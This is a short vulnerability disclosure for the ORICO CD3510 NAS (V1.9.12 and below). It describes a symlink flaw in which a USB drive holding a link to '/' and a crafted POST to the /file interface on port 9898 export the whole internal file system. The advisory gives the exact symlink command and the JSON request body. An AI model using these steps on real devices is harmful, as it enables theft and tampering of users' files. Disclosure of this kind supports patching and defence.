Vendor: ORICO
Affected Product: CD3510 NAS ≤ V1.9.12
Vendor Homepage: https://orico.cc/
Vendor Contact Information: supports@orico.com.cn
The ORICO NAS CD3510 (version V1.9.12 and below) contains a vulnerability that could be exploited by attackers to leak or tamper with the internal file system. This vulnerability stems from lax checks on symbolic links within external USB devices. Attackers can create a symbolic link to its root directory, insert the drive into the NAS device's slot, then access the USB drive's symlink directory mounted on the NAS to obtain all files within the NAS system and tamper with those files.
Format the USB drive to ext4 format, and then create a symbolic link within it, such as sudo ln -s / rootdir, to create a symbolic link to the root directory.
Then insert the USB flash drive into the external USB slot of the NAS device. An attacker can send the following POST message to the /file interface on port 9898 of the NAS, and export the entire internal file system of the NAS through the symbolic link in the USB.
{
"session": "HS_clo41CDBJEgM4VEafG0QK4GggLDrp6",
"method": "manage",
"params": {
"action": 0,
"des_path_type": 2,
"todir": "/",
"cmd": "copy",
"path": [
"/sdc1/rootdir/***"
],
"share_path_type": 7,
"to_groupid": 0
}
}
Finally, we can see that the entire file system directory inside the NAS has been exported.
NASchecker